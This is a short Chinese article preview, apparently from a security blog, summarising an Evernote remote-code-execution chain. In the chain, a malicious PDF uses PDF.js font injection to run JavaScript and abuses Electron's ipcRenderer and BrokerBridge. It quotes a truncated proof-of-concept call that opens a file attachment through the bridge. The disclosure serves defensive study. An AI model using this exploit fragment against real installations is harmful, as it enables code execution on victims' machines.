文章预览
前言 一句话总结(点击原文跳转) 主要描述了一个在Evernote应用中发现的关键性漏洞,该漏洞可以通过嵌入恶意PDF文件到笔记中,利用PDF.js的字体注入进行JavaScript代码执行,进而通过Electron的ipcRenderer和BrokerBridge实现跨进程通信,最终达到远程代码执行(RCE)的攻击链。 关键信息点 //部分poc window.top.electronApi.ipcRenderer.send( 'BrokerBridge' , {action: 'Bridge/Call' ,id: '7e803824-d666-4ffe-9ebb-39ac1bd7856f' ,topics: 'boron.actions.openFileAttachment' ,data:{ 'resource' : { 'hash' : '2f82623f9523c0d167862cad0eff6806' , 'mime' : 'application/octet-stream' , 'rect' : { 'left' : 68 , 'top' : 155 , 'width' : 728.1428833007812 , 'height' : 43.42857360839844 }, 'state' : 'loaded' , 'reference' : '22cad1af-d431-4af6-b818-0e34f9ff150b' , 'selected' : true , 'url' : 'en-cache://tokenKey%3D%22AuthToken%3AUser%3A245946624%22+f4cbd0d2-f670-52a7-7ea7-5720d65614fd+2f82623f9523c0d
………………………………